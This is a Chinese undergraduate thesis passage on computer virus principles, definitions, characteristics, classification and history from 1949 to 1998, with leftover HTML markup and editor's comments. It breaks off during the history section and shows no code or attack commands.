病毒查殺畢業(yè)論文

1、<p>　　編號(hào) </p><p><b>　　畢業(yè)論文</b></p><p><b>　　二〇一三年六月</b></p><p>　題 目計(jì)算機(jī)病毒的原理與防范查殺</p><p><b>　　摘 要</b></p><p

2、>　　隨著計(jì)算機(jī)技術(shù)的發(fā)展，計(jì)算機(jī)在每一個(gè)行業(yè)都得到了廣泛的應(yīng)用，各行各業(yè)對(duì)計(jì)算機(jī)系統(tǒng)的依賴(lài)越來(lái)越大，但是，隨著計(jì)算機(jī)網(wǎng)絡(luò)的發(fā)展，計(jì)算機(jī)病毒對(duì)信息安全的威脅日益嚴(yán)重，我們一方面要掌握對(duì)當(dāng)前計(jì)算機(jī)病毒的防范措施，另一方面要加強(qiáng)對(duì)病毒未來(lái)發(fā)展趨勢(shì)的研究，真正做到防患于未然?，F(xiàn)在計(jì)算機(jī)病毒是現(xiàn)代信息化社會(huì)的公害，是計(jì)算機(jī)犯罪的一種特殊形式。各種計(jì)算機(jī)病毒的產(chǎn)生和全球性的蔓延已經(jīng)給計(jì)算機(jī)系統(tǒng)的安全造成了巨大的危害和損害，其造成的計(jì)算機(jī)資源

3、的損失和破壞，不但會(huì)造成資源和財(cái)富的巨大浪費(fèi)，而且有可能造成社會(huì)性的災(zāi)難。</p><p>　　加一點(diǎn)怎么查殺的內(nèi)容。</p><p>　　關(guān)鍵詞：計(jì)算機(jī)病毒 網(wǎng)絡(luò) 防范 </p><p><b>　　目 錄</b></p><p><b>　　摘 要I</b></p>

4、<p><b>　　目 錄II</b></p><p><b>　　第一章 緒論1</b></p><p><b>　　1.1 前言1</b></p><p>　　1.2 論文目標(biāo)1</p><p>　　1.3 課題研究的意義2</p>

5、<p>　　第二章 計(jì)算機(jī)病毒概述3</p><p>　　2.1 計(jì)算機(jī)病毒定義3</p><p>　　2.2 宏和宏病毒的概念4</p><p>　　2.2 計(jì)算機(jī)病毒的基本特征5</p><p>　　2.2.1 感染性5</p><p>　　2.2.2 潛伏性（隱蔽性）5</p>

6、<p>　　2.2.3 可觸發(fā)性5</p><p>　　2.2.4 破壞性6</p><p>　　2.3 計(jì)算機(jī)病毒的分類(lèi)6</p><p>　　2.3.1 傳統(tǒng)的計(jì)算機(jī)病毒6</p><p>　　2.3.2 計(jì)算機(jī)病毒的發(fā)展簡(jiǎn)史7</p><p>　　第三章 計(jì)算機(jī)病毒的結(jié)構(gòu)和作用機(jī)制14&

7、lt;/p><p>　　3.1 計(jì)算機(jī)病毒的結(jié)構(gòu)組成14</p><p>　　3.2 病毒的引導(dǎo)部分15</p><p>　　3.2.1 病毒的引導(dǎo)模塊和引導(dǎo)機(jī)制15</p><p>　　3.3恢復(fù)系統(tǒng)功能16</p><p>　　3.3.1 病毒引導(dǎo)部分舉例16</p><p>　　3.

8、4 病毒的感染部分19</p><p>　　3.4.1 病毒的感染模塊及感染機(jī)制19</p><p>　　3.4.2 感染部分程序的舉例20</p><p>　　3.5 病毒的表現(xiàn)（破壞）部分24</p><p>　　3.5.1 病毒的表現(xiàn)（破壞）模塊及表現(xiàn)（破壞）機(jī)制24</p><p>　　3.5.2 表

9、現(xiàn)部分程序舉例25</p><p>　　3.6 宏病毒的運(yùn)行機(jī)制30</p><p>　　第四章 檢測(cè)計(jì)算機(jī)病毒的基本方法34</p><p>　　4.1 外觀檢測(cè)法34</p><p>　　4.1.1 屏幕顯示異常34</p><p>　　4.1.2 聲音異常34</p><p>

10、　　4.1.3 系統(tǒng)工作異常35</p><p>　　4.1.4 文件異常35</p><p>　　4.2 計(jì)算機(jī)病毒檢測(cè)的綜合方法36</p><p>　　4.3 檢測(cè)宏病毒的基本方法41</p><p>　　第五章 清除計(jì)算機(jī)病毒的基本技術(shù)43</p><p>　　5.1 清除計(jì)算機(jī)病毒的一般性原則43

11、</p><p>　　5.2 清除宏病毒的基本方法45</p><p><b>　　第六章 總結(jié)46</b></p><p><b>　　致 謝47</b></p><p><b>　　參考文獻(xiàn)48</b></p><p><b>　

12、　緒論</b></p><p><b>　　1.1 前言</b></p><p>　　計(jì)算機(jī)技術(shù)的迅猛發(fā)展，給人們的工作和生活帶來(lái)了前所未有的便利和效率，隨著計(jì)算機(jī)走進(jìn)社會(huì)的各個(gè)領(lǐng)域，走進(jìn)千家萬(wàn)戶，計(jì)算機(jī)系統(tǒng)已經(jīng)能實(shí)現(xiàn)生活、管理、辦公的自動(dòng)化，成為人類(lèi)社會(huì)不可或缺的一部分。與此同時(shí)，計(jì)算機(jī)安全的重要性也被越來(lái)越多的人認(rèn)識(shí)到，商業(yè)界、金融銀行界要依靠計(jì)算機(jī)處

13、理事務(wù)，政府的行政管理要依靠計(jì)算機(jī)信息系統(tǒng)和數(shù)據(jù)庫(kù)，廠家和公司的全部生產(chǎn)取決于數(shù)據(jù)處理系統(tǒng)的能力，陸、海、空、宇航等指揮系統(tǒng)，醫(yī)療衛(wèi)生要依靠計(jì)算機(jī)技術(shù)，整個(gè)社會(huì)對(duì)計(jì)算機(jī)信息系統(tǒng)的依賴(lài)越來(lái)越大，甚至離不開(kāi)它。然而，計(jì)算機(jī)系統(tǒng)并不安全，其不安全因素有計(jì)算機(jī)信息系統(tǒng)自身的、自然的，也有人為的。計(jì)算機(jī)系統(tǒng)就是最不安全的因素之一。隨著信息化社會(huì)的發(fā)展，計(jì)算機(jī)病毒的威脅日益嚴(yán)重，迄今為止，已發(fā)現(xiàn)的病毒種類(lèi)很多，而且還以相當(dāng)驚人的速度遞增，令人們談病

14、毒而色變。人們將計(jì)算機(jī)病毒稱(chēng)之為“21世紀(jì)最大的隱患”、“不流血的致命武器”，它的出現(xiàn)完全有可能改變?nèi)祟?lèi)的未來(lái)，因此反病毒的任務(wù)變得更加艱巨了。</p><p><b>　　1.2 論文目標(biāo)</b></p><p>　　為了培養(yǎng)學(xué)生嚴(yán)肅認(rèn)真的科學(xué)態(tài)度和實(shí)事求是的工作作風(fēng)，形成正確的世界觀和價(jià)值觀，掌握科學(xué)的方法論。</p><p>　　為了培養(yǎng)

15、學(xué)生綜合應(yīng)用所學(xué)基礎(chǔ)理論、專(zhuān)門(mén)知識(shí)、基本技能的發(fā)現(xiàn)。分析、解決與電腦中了病毒的實(shí)際問(wèn)題的能力，以及從事其他科學(xué)研究工作或負(fù)擔(dān)專(zhuān)門(mén)技術(shù)工作的基本能力。</p><p>　　為了能讓稍微了解電腦的人們?cè)谧约弘娔X中了病毒時(shí)能夠自己動(dòng)手解決不已。</p><p>　　1.3 課題研究的意義</p><p>　　當(dāng)今社會(huì)是一個(gè)信息化的社會(huì)，隨著internet的出現(xiàn)使得信息出

16、現(xiàn)了爆炸性的增長(zhǎng)。從而使得信息泛濫成災(zāi)，嚴(yán)重的影響了重要信息和知識(shí)的傳播。隨著internet的普及，互聯(lián)網(wǎng)以一股巨大變革力量的面貌出現(xiàn)在商務(wù)關(guān)系領(lǐng)域。它的強(qiáng)大功能被人們深刻的記著，并且已經(jīng)在各個(gè)領(lǐng)域發(fā)揮著越來(lái)越重要的作用。</p><p>　　但是，計(jì)算機(jī)病毒的出現(xiàn)將成為計(jì)算機(jī)使用者的噩夢(mèng)，它的功能就是破壞，破壞計(jì)算機(jī)里的一切信息，甚至?xí)茐挠?jì)算機(jī)本身的硬件，使得計(jì)算機(jī)使用者無(wú)法使用，不僅僅是對(duì)計(jì)算機(jī)使用者而言

17、，對(duì)使用計(jì)算機(jī)的公司也會(huì)造成巨大的損失。如果能夠?qū)τ?jì)算機(jī)病毒有足夠的了解，就會(huì)對(duì)計(jì)算機(jī)病毒進(jìn)行防范，即使中了病毒也能去解決，從而不會(huì)造成很大的損失。</p><p><b>　　計(jì)算機(jī)病毒概述</b></p><p>　　2.1 計(jì)算機(jī)病毒定義</p><p>　　計(jì)算機(jī)病毒是一個(gè)程序, 一段可執(zhí)行碼。像生物病毒一樣, 計(jì)算機(jī)病毒有其獨(dú)特的復(fù)制

18、能力, 可以很快地蔓延, 又常常難以根除, 它們能把自身附著在各種類(lèi)型的文件上, 當(dāng)文件被復(fù)制或從一個(gè)用戶傳送到另一個(gè)用戶時(shí), 它們就隨同文件一起蔓延開(kāi)來(lái)?，F(xiàn)在, 隨著計(jì)算機(jī)網(wǎng)絡(luò)的發(fā)展, 計(jì)算機(jī)病毒和計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)相結(jié)合, 蔓延的速度更加迅速。在生物學(xué)中, 病毒是指侵入動(dòng)植物體等有機(jī)生命體中的具有感染性、潛伏性、破壞性的微生物, 而且不同的病毒具有不同的誘發(fā)因素?！坝?jì)算機(jī)病毒”一詞是人們聯(lián)系到破壞計(jì)算機(jī)系統(tǒng)的“病原體”具有與生物病毒相似

19、的特征, 借用生物學(xué)病毒而使用的計(jì)算機(jī)術(shù)語(yǔ)?！坝?jì)算機(jī)病毒”一詞最早出現(xiàn)在美國(guó)作家Thomas J . Ryan 于1977 年出版的科幻小說(shuō)《The Adolescence of P-1》中。</p><p>　　1983 年, 美國(guó)計(jì)算機(jī)安全專(zhuān)家Frederick Cohen 博士首次提出計(jì)算機(jī)病毒的存在, 他認(rèn)為： 計(jì)算機(jī)病毒是一個(gè)能感染其他程序的程序, 它靠修改其他程序, 并把自身的拷貝嵌入其他程序而實(shí)現(xiàn)病

20、毒的感染。1989 年, 他進(jìn)一步將計(jì)算機(jī)病毒定義為：“病毒程序通過(guò)修改其他程序的方法將自己的精確拷貝或可能演化的形式放入其他程序中, 從而感染它們”。所謂感染, 是指病毒將自身嵌入到指令序列中, 致使執(zhí)行合法程序的操作招致病毒程序的共同執(zhí)行( 或是以病毒程序的執(zhí)行取而代之) 。</p><p>　　1994 年《中華人們共和國(guó)計(jì)算機(jī)安全保護(hù)條例》定義：“計(jì)算機(jī)病毒是指編制或者在計(jì)算機(jī)程序中插入的, 破壞計(jì)算機(jī)功

21、能或數(shù)據(jù)、影響計(jì)算機(jī)使用, 并能自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼”。當(dāng)然, 還有其他人的不完全相同的定義, 但都大同小異。</p><p>　　2.2 宏和宏病毒的概念</p><p>　　宏病毒與傳統(tǒng)的計(jì)算機(jī)病毒有很大的不同，它不感染. EXE、. COM 等可執(zhí)行文件, 而是將病毒代碼以宏( Macro) 的形式潛伏在Microsoft Office 文件中, 當(dāng)采用Office

22、軟件打開(kāi)這些染毒文件時(shí), 這些代碼就會(huì)被執(zhí)行并產(chǎn)生破壞作用。由于宏是使用Visual Basic For Application 這樣的高級(jí)語(yǔ)言編寫(xiě)的, 因此其編寫(xiě)過(guò)程相對(duì)比較簡(jiǎn)單, 而功能又十分強(qiáng)大。隨著Microsoft Office 軟件在全世界范圍內(nèi)的不斷普及, 宏病毒已成為傳播最廣、危害最大的一類(lèi)病毒。</p><p>　　由于在目前發(fā)現(xiàn)的宏病毒當(dāng)中, 感染W(wǎng)ord 的病毒占絕大多數(shù), 所以人們談?wù)摰暮?/p>

23、病毒一般是指Word 宏病毒, 而了解Word 宏病毒之后, 也就不難理解其他的宏病毒了。在Windows 環(huán)境下數(shù)據(jù)文件是由Word 等文字處理軟件建立的, 被稱(chēng)為文檔文件或文檔。Word 文檔中包含兩種信息： 一是文本信息或稱(chēng)文本, 是由中英文文字組成的段落篇章; 二是格式信息, 包括表格、字體、字號(hào)等信息。</p><p>　　在Microsoft Word 中對(duì)宏的定義為“宏就是能夠組織在一起的, 可以作

24、為一個(gè)獨(dú)立命令來(lái)執(zhí)行的一系列Word 命令, 它能使日常工作變得容易”。簡(jiǎn)單地講, 宏就是一組批處理命令, 是用高級(jí)語(yǔ)言( VB) 編寫(xiě)的一段程序。Word 文檔中的格式信息就包含了很多這樣的宏。Word 的宏語(yǔ)言有十分強(qiáng)大的功能, 它具備訪問(wèn)系統(tǒng)的能力, 可以直接運(yùn)行DOS 系統(tǒng)命令, 調(diào)用Windows API 、DLL 等。這些操作都可能對(duì)系統(tǒng)的安全直接構(gòu)成威脅。</p><p>　　如果一個(gè)宏中包含了上述

25、形式的有破壞能力的命令, 并且還有自我復(fù)制功能, 這個(gè)宏就成了宏病毒。概括起來(lái)講, 宏病毒就是使用宏語(yǔ)言編寫(xiě)的有一定破壞能力的程序, 可以在一些數(shù)據(jù)處理系統(tǒng)中運(yùn)行( 主要是微軟的辦公軟件系統(tǒng), 字處理、電子數(shù)據(jù)表和其他Office 程序中) , 存在于字處理文檔、數(shù)據(jù)表格、數(shù)據(jù)庫(kù)、演示文檔等數(shù)據(jù)文件中, 利用宏語(yǔ)言的功能將自己復(fù)制到其他數(shù)據(jù)文檔中。</p><p>　　除了Word 宏病毒外, 常見(jiàn)的還有Exce

26、l 宏病毒、PowerPoint 宏病毒等, 主要是針對(duì)Microsoft Office 軟件的。</p><p>　　2.2 計(jì)算機(jī)病毒的基本特征</p><p><b>　　2.2.1 感染性</b></p><p>　　計(jì)算機(jī)病毒的感染性是指計(jì)算機(jī)病毒具有把自身復(fù)制到其他程序中的特性。感染性是計(jì)算機(jī)病毒的根本屬性，它是判斷一個(gè)程序是否為病

27、毒程序的主要依據(jù)。病毒它可以感染文件、硬盤(pán)、個(gè)人計(jì)算機(jī)、局部網(wǎng)絡(luò)和互聯(lián)網(wǎng)。計(jì)算機(jī)病毒的感染是指從一個(gè)網(wǎng)絡(luò)侵入另一個(gè)網(wǎng)絡(luò)，由一個(gè)系統(tǒng)擴(kuò)散到另一個(gè)系統(tǒng)，由一個(gè)磁盤(pán)進(jìn)入到另一個(gè)磁盤(pán)，或者由一個(gè)文件傳播到另一個(gè)文件的過(guò)程。</p><p>　　2.2.2 潛伏性（隱蔽性）</p><p>　　計(jì)算機(jī)病毒的潛伏性是指其具有依附于其他媒體而寄生的能力，即通過(guò)修改其他程序而自身的復(fù)制品嵌入到其他程序或磁

28、盤(pán)的引導(dǎo)區(qū)( 包括硬盤(pán)的主引導(dǎo)區(qū)中) 寄生。這種能力是隱蔽的，大多數(shù)計(jì)算機(jī)病毒的感染速度極快。而且大多數(shù)計(jì)算機(jī)病毒都采用特殊的隱藏技術(shù)，例如有些計(jì)算機(jī)病毒感染正常程序時(shí)將程序文件壓縮，留出空間嵌入計(jì)算機(jī)病毒程序，這樣使被計(jì)算機(jī)病毒感染的程序文件的長(zhǎng)度變化很小，很難被發(fā)現(xiàn)；有些計(jì)算機(jī)病毒修改文件的屬性等；還有些計(jì)算機(jī)病毒可以加密、變型( 多態(tài)病毒) 或防止反匯編、防跟蹤等等都是為了不讓被感染的計(jì)算機(jī)用戶發(fā)現(xiàn)。當(dāng)計(jì)算機(jī)病毒侵入系統(tǒng)后，一般并

29、不立即發(fā)作，而是具有一定的潛伏期。在潛伏期，只要條件許可，病毒就會(huì)不斷地進(jìn)行感染。</p><p>　　2.2.3 可觸發(fā)性</p><p>　　計(jì)算機(jī)病毒一般都有一個(gè)觸發(fā)條件：或者觸發(fā)其感染,，即在一定的條件下激活一個(gè)計(jì)算機(jī)病毒的感染機(jī)制使之進(jìn)行感染；或者觸發(fā)其發(fā)作，即在一定條件下激活計(jì)算機(jī)病毒的表現(xiàn)( 破壞) 部分。條件判斷是計(jì)算機(jī)病毒自身特有的功能， 一種計(jì)算機(jī)病毒一般設(shè)置一定的觸發(fā)

30、條件。病毒程序在運(yùn)行時(shí)，每次都要檢測(cè)控制條件，一旦條件成熟，病毒就開(kāi)始感染或發(fā)作。觸發(fā)條件可能是指定的某個(gè)時(shí)間或日期、特定的用戶識(shí)別符的出現(xiàn)、特定文件的出現(xiàn)或使用次數(shù)、用戶的安全保密等級(jí)、某些特定的數(shù)據(jù)等等。</p><p><b>　　2.2.4 破壞性</b></p><p>　　計(jì)算機(jī)病毒的破壞性是病毒的重要特征，如果一個(gè)計(jì)算機(jī)病毒對(duì)計(jì)算機(jī)沒(méi)有任何破壞的壞，那么

31、這個(gè)病毒還有什么用呢？當(dāng)然，計(jì)算機(jī)病毒的破壞性取決于設(shè)計(jì)者的目的水平，如果病毒設(shè)計(jì)者的目的在于破壞系統(tǒng)的正常運(yùn)行，則可以毀掉或修改系統(tǒng)內(nèi)的部分或全部數(shù)據(jù)或文件，例如改寫(xiě)文件、刪除文件、格式化磁盤(pán)等等；可以干擾或迷惑用戶的操作，例如鎖死鍵盤(pán)或修改鍵盤(pán)的功能等等；可以干擾系統(tǒng)的運(yùn)行，如干擾屏幕顯示、降低機(jī)器的運(yùn)行速度等等；也可以損壞硬件( 主板, 磁盤(pán)等) 。</p><p>　　歸納起來(lái)，計(jì)算機(jī)病毒的危害大致有以下

32、幾個(gè)方面：</p><p>　　1、對(duì)計(jì)算機(jī)數(shù)據(jù)信息進(jìn)行直接的破壞</p><p><b>　　2、搶占系統(tǒng)資源</b></p><p>　　3、影響計(jì)算機(jī)運(yùn)行速度</p><p>　　4、病毒對(duì)計(jì)算機(jī)硬件的破壞</p><p>　　2.3 計(jì)算機(jī)病毒的分類(lèi)</p><p>

33、;　　2.3.1 傳統(tǒng)的計(jì)算機(jī)病毒</p><p>　　按計(jì)算機(jī)病毒攻擊的機(jī)型分類(lèi)：有攻擊微型機(jī)的病毒、攻擊小型機(jī)的病毒和攻擊工作站的病毒。</p><p>　　按計(jì)算機(jī)病毒攻擊的操作系統(tǒng)分類(lèi)：有攻擊DOS的病毒、攻擊Windows系統(tǒng)的病毒、攻擊Unix或OS/2系統(tǒng)的病毒。</p><p>　　按傳播媒介分類(lèi)：有單機(jī)病毒、網(wǎng)絡(luò)病毒。</p><

34、;p>　　按計(jì)算機(jī)病毒的寄生方式分類(lèi)：有源碼型病毒、入侵型病毒、外殼型病毒、操作系統(tǒng)型病毒。</p><p>　　按病毒的表現(xiàn)（破壞）分類(lèi)：有良性病毒、惡性病毒。</p><p>　　按計(jì)算機(jī)病毒寄生方式和感染途徑分類(lèi)：有引導(dǎo)型病毒、文件型病毒、混合型病毒。</p><p>　　2.3.2 計(jì)算機(jī)病毒的發(fā)展簡(jiǎn)史 寫(xiě)得太多 簡(jiǎn)單一點(diǎn)</p><

35、;p>　　計(jì)算機(jī)剛剛誕生, 就有了計(jì)算機(jī)病毒的概念。1949 年, 計(jì)算機(jī)之父馮·諾依曼在《復(fù)雜自動(dòng)機(jī)組織論》中便定義了病毒的基本概念。他提出“一部事實(shí)上足夠復(fù)雜的機(jī)器能夠復(fù)制自身”, 但當(dāng)時(shí)的人們還不能理解能夠復(fù)制自身的概念( 而能夠復(fù)制自身正是計(jì)算機(jī)病毒的本質(zhì)特征之一) , 所以并沒(méi)有多少人認(rèn)真對(duì)待計(jì)算機(jī)病毒這種事情。</p><p>　　20 世紀(jì)60 年代初, 美國(guó)貝爾實(shí)驗(yàn)室里,3 個(gè)年輕

36、的程序員編寫(xiě)了一個(gè)名為“磁芯大戰(zhàn)”的游戲, 游戲中通過(guò)復(fù)制自身來(lái)擺脫對(duì)方的控制, 這就是所謂“計(jì)算機(jī)病毒”的第一個(gè)雛形。而“計(jì)算機(jī)病毒”作為一個(gè)名詞, 最早出現(xiàn)在科幻小說(shuō)之中。1975 年, 美國(guó)科普作家John Bruner( 約翰·布魯勒爾) 在他的名為《Shock Wave Rider》( 《震蕩波騎士》) 的書(shū)中,出現(xiàn)了以“Virus”用電腦作為邪惡代表的工具的故事。1977 年, 美國(guó)的Thomas J . Ryan

37、( 托馬斯·簡(jiǎn)·瑞恩) 在其名為《The Adolescence of P-1》( 《P-1 的青春》) 的科幻小說(shuō)中, 幻想</p><p>　　出世界上第一個(gè)計(jì)算機(jī)病毒, 它可以從一臺(tái)計(jì)算機(jī)感染到另一臺(tái)計(jì)算機(jī), 最終控制了7000 臺(tái)計(jì)算機(jī)的操作系統(tǒng), 造成了一場(chǎng)大災(zāi)難。</p><p>　　1981 年, 世界上誕生了真正意義上的計(jì)算機(jī)病毒———Elk Clone

38、r , 這個(gè)病毒將自己附著在磁盤(pán)的引導(dǎo)扇區(qū)上, 通過(guò)磁盤(pán)進(jìn)行感染。由于它沒(méi)有造成多大的破壞, 只是關(guān)掉顯示器, 讓顯示的文本閃爍或顯示一大堆亂七八糟的信息, 所以, 它沒(méi)有引起大家的關(guān)注。</p><p>　　1983 年, 計(jì)算機(jī)病毒首次在計(jì)算機(jī)界被確認(rèn)存在。1983 年11 月3 日, 美國(guó)計(jì)算機(jī)安全學(xué)術(shù)討論會(huì)上, 美國(guó)計(jì)算機(jī)安全專(zhuān)家Frederick Cohen 博士首次提出計(jì)算機(jī)病毒的概念。同一天, 專(zhuān)家

39、們?cè)谶\(yùn)行Unix 操作系統(tǒng)的VAX11/ 750 計(jì)算機(jī)系統(tǒng)上驗(yàn)證了計(jì)算機(jī)病毒的存在。在其后的一周內(nèi), 在5 次病毒試驗(yàn)中, 平均30 分鐘病毒就可使計(jì)算機(jī)系統(tǒng)癱瘓, 由此不僅確認(rèn)了計(jì)算機(jī)病毒的存在, 而且認(rèn)識(shí)到計(jì)算機(jī)病毒對(duì)計(jì)算機(jī)系統(tǒng)的破壞作用。</p><p>　　1986 年底, 病毒Brain 開(kāi)始流行, 這是由巴基斯坦兩兄弟Basit 和Amjad Farooq Alvi制造的, 據(jù)他們說(shuō), 制作這個(gè)病毒

40、的目的是檢驗(yàn)一下盜版問(wèn)題在巴基斯坦的嚴(yán)重程度( 事實(shí)上, 病毒的蔓延遠(yuǎn)遠(yuǎn)超出了他們的估計(jì)) 。Brain 病毒首次使用了偽裝的手段來(lái)迷惑計(jì)算機(jī)用戶。1987 年10 月, 美國(guó)新聞機(jī)構(gòu)報(bào)道了這一例計(jì)算機(jī)遭病毒入侵及引起破壞的事件, 從此計(jì)算機(jī)病毒開(kāi)始受到廣大民眾的關(guān)注。</p><p>　　在這一年, 中國(guó)的公安部成立了計(jì)算機(jī)病毒研究小組, 并派出專(zhuān)業(yè)技術(shù)人員到中科院計(jì)算所和美國(guó)、歐洲進(jìn)修, 學(xué)習(xí)計(jì)算機(jī)安全技術(shù),

41、 標(biāo)志著計(jì)算機(jī)病毒引起了中國(guó)政府的警惕。</p><p>　　1987 年, 病毒現(xiàn)象逐步升溫, 這一年,DOS 環(huán)境下的文件型病毒得到了很大的發(fā)展,同時(shí)出現(xiàn)了很多的IBM PC 兼容機(jī)上的病毒。這一年, 首次出現(xiàn)了能自我加解密的Cascade 病毒, 標(biāo)志著計(jì)算機(jī)病毒制造技術(shù)的進(jìn)一步提高, 這也說(shuō)明了病毒與反病毒技術(shù)的互相對(duì)抗、克制, 能自我加解密的病毒還有著名的新西蘭的Stoned 病毒和意大利的PingPo

42、ng 病毒等等。同年12 月份, 第一個(gè)網(wǎng)絡(luò)病毒———Christmas Tree 病毒———開(kāi)始流行, 這種病毒在VM/ CMS 操作系統(tǒng)下傳播, 造成了IBM 公司內(nèi)部網(wǎng)絡(luò)的系統(tǒng)癱瘓。1988 年6 月13 號(hào), 這天正好是星期五, 一些國(guó)家的公司和大學(xué)遭到了“耶路撒冷”( Jerusalem) 病毒的攻擊。該病毒因攻擊了耶路撒冷大學(xué)而得名, 又因?yàn)樗窃诜?987 年的既是13 號(hào)又是星期五的這天爆發(fā), 所以又被稱(chēng)為“黑色星期五”

43、。</p><p>　　1988 年, 各種計(jì)算機(jī)病毒相繼出現(xiàn)并廣泛傳播。11 月2 日, 美國(guó)康奈爾大學(xué)的學(xué)生,23 歲的Morris 將自己編制的蠕蟲(chóng)程序輸入到計(jì)算機(jī)網(wǎng)絡(luò)中, 在幾小時(shí)內(nèi)造成Internet 的堵塞,6 000 多臺(tái)計(jì)算機(jī)被感染, 造成巨大的損失。從此在國(guó)際計(jì)算機(jī)領(lǐng)域掀起了一個(gè)談?wù)摬《镜母叱? 一時(shí)成為計(jì)算機(jī)界的熱點(diǎn)。在美國(guó), 僅1988 年中, 就約有9 萬(wàn)臺(tái)計(jì)算機(jī)遭計(jì)算機(jī)病毒入侵, 大家公

44、認(rèn)1988 年為世界計(jì)算機(jī)病毒年。</p><p>　　1988 年11 月,《人民日?qǐng)?bào)》就Morris 事件報(bào)道了關(guān)于病毒的事件, 這是國(guó)內(nèi)媒體首次關(guān)注計(jì)算機(jī)病毒。</p><p>　　同時(shí), 反病毒技術(shù)也已經(jīng)開(kāi)始成熟了, 所羅門(mén)公司的反病毒工具———Doctors Solomon’sAnti- Virus Toolkit ———成為當(dāng)時(shí)最強(qiáng)大的反病毒軟件。</p><

45、;p>　　1989 年, 病毒家族開(kāi)始出現(xiàn)了, 比如Yankee 病毒( 這是一個(gè)惡性病毒, 會(huì)格式化硬盤(pán)) 。同年出現(xiàn)的Eddie 病毒則可以駐留內(nèi)存, 不僅感染被調(diào)用的文件, 還感染被打開(kāi)或被拷貝的文件。Frodo 病毒是第一個(gè)全秘密寄生的文件病毒, 它不改變被感染文件的長(zhǎng)度。同年出現(xiàn)了名為AIDS 的特洛伊木馬型病毒, 作者Popp 博士因靠此病毒為受害者恢復(fù)數(shù)據(jù)勒索錢(qián)財(cái)而被捕入獄。</p><p>

46、　　1989 年4 月西南鋁廠首先報(bào)告在其計(jì)算機(jī)中發(fā)現(xiàn)“小球”病毒。同年, 又有一些單位的計(jì)算機(jī)也發(fā)現(xiàn)“小球”病毒及其變種或其他病毒, 自此, 計(jì)算機(jī)病毒開(kāi)始侵入我國(guó)( 沒(méi)有記錄的病毒侵入肯定更早) 。</p><p>　　1989 年7 月, 中國(guó)公安部推出了中國(guó)最早的殺毒軟件Kill 6 .0 , Kill 軟件在隨后很長(zhǎng)的一段時(shí)間內(nèi)都是由公安部免費(fèi)向國(guó)內(nèi)部分用戶發(fā)放。</p><p>

47、;　　1990 年, 出現(xiàn)了第一個(gè)多態(tài)病毒Chameleon 、使用多級(jí)加密解密和反跟蹤技術(shù)的病毒W(wǎng)hale 等具有更好隱藏技術(shù)的病毒, 標(biāo)志著病毒制造技術(shù)的又一次提高。同年, 保加利亞的程序員開(kāi)發(fā)出了可以用于開(kāi)發(fā)病毒的工具軟件———Virus Production Factory ; 同樣在保加利亞, 同年出現(xiàn)了專(zhuān)門(mén)為病毒制造者開(kāi)設(shè)的進(jìn)行病毒信息交流和病毒交換的BBS。</p><p>　　1990 年, 中國(guó)

48、出現(xiàn)了基于硬件的反病毒系統(tǒng)———華星防病毒卡, 取得不錯(cuò)的銷(xiāo)售業(yè)績(jī)。</p><p>　　1991 年, 計(jì)算機(jī)病毒的數(shù)量持續(xù)上升, 世界上已知病毒的總數(shù)已向1000 攀升。這一年發(fā)現(xiàn)的比較有名的病毒有能夠同時(shí)感染文件和引導(dǎo)區(qū)的復(fù)合多態(tài)病毒Tequila ; 不存在于某個(gè)文件或引導(dǎo)扇區(qū)中的DIR II 病毒, 它將自己分成小塊, 然后放在磁盤(pán)上的多個(gè)扇區(qū)中, 運(yùn)行的時(shí)候再進(jìn)行組裝和執(zhí)行; 攻擊網(wǎng)絡(luò)的GPI 病毒等

49、。</p><p>　　這一年, 反病毒公司也得到了發(fā)展壯大,Symantec( 著名的反病毒工具軟件Norton 就是它的產(chǎn)品) 和Central Point( 以軟件PCTOOLS 著名) 兩個(gè)重要的工具軟件開(kāi)發(fā)商開(kāi)始介入殺毒市場(chǎng)。中國(guó)的瑞星公司成立, 推出了瑞星防病毒卡。</p><p>　　1992 年, 多態(tài)病毒生成器“MtE”開(kāi)發(fā)出來(lái), 同年, 一個(gè)病毒構(gòu)造工具集———Viru

50、s CreateLibrary ———開(kāi)發(fā)成功。這些病毒開(kāi)發(fā)工具或一些BBS 的出現(xiàn)又刺激了新的、更加強(qiáng)大和完善的病毒制造工具被不斷開(kāi)發(fā)出來(lái), 所有這些病毒制造工具或BBS 上的信息交流促使了更多的病毒被源源不斷地制造出來(lái)。這一年, 在芬蘭發(fā)現(xiàn)了首例Windows 病毒。</p><p>　　1993 年、1994 年, 采用密碼技術(shù)、編寫(xiě)技巧高超的隱蔽型病毒和多態(tài)性病毒相繼出現(xiàn), 而且社會(huì)上出現(xiàn)了計(jì)算機(jī)病毒的恐

51、慌和騙局, 也出現(xiàn)了感染源代碼文件( 主要是C 語(yǔ)言和Pascal 語(yǔ)言) 的Src Vir 病毒和感染OBJ 文件的Shifter 病毒。在這兩年中, 中國(guó)的殺毒軟件KILL( V68) 和KV100 開(kāi)始銷(xiāo)售1995 年8 月9 日, 在美國(guó)首次發(fā)現(xiàn)專(zhuān)門(mén)攻擊Word 文件的新病毒———宏病毒Concept 。以前的病毒都是在DOS 或Unix 操作系統(tǒng)下感染和破壞的,Concept 病毒的出現(xiàn), 宣告了攻擊Windows 操作系統(tǒng)的

52、病毒的大規(guī)模出現(xiàn)。</p><p>　　1996 年和1997 年開(kāi)始了新一輪的計(jì)算機(jī)病毒的進(jìn)化, 隨著微軟新的操作系統(tǒng)Windows 95 、Windows NT 和微軟辦公軟件Office 的流行, 病毒制造者開(kāi)始面對(duì)新的環(huán)境, 制造出了許多新的病毒。1997 年2 月, 第一個(gè)Linux 環(huán)境下的病毒Bliss 出現(xiàn), 結(jié)束了Linux 系統(tǒng)從未被病毒感染的歷史。1997 年4 月, 第一個(gè)使用文件傳輸協(xié)議

53、( FTP ：FileTransport Protocol) 進(jìn)行傳播的Homer 病毒出現(xiàn)。</p><p>　　1998 年6 月, 被稱(chēng)作有史以來(lái)影響最大的病毒———CIH 病毒———被發(fā)現(xiàn), 這是世界上首例能夠破壞硬件的病毒, 它既攻擊硬盤(pán)中的文件系統(tǒng), 又攻擊計(jì)算機(jī)硬件( 主板) , 并使其損壞。它的破壞性使其聞名世界。這一年也出現(xiàn)了許多新型病毒, 如遠(yuǎn)程控制工具“Back Orifice”、“Netb

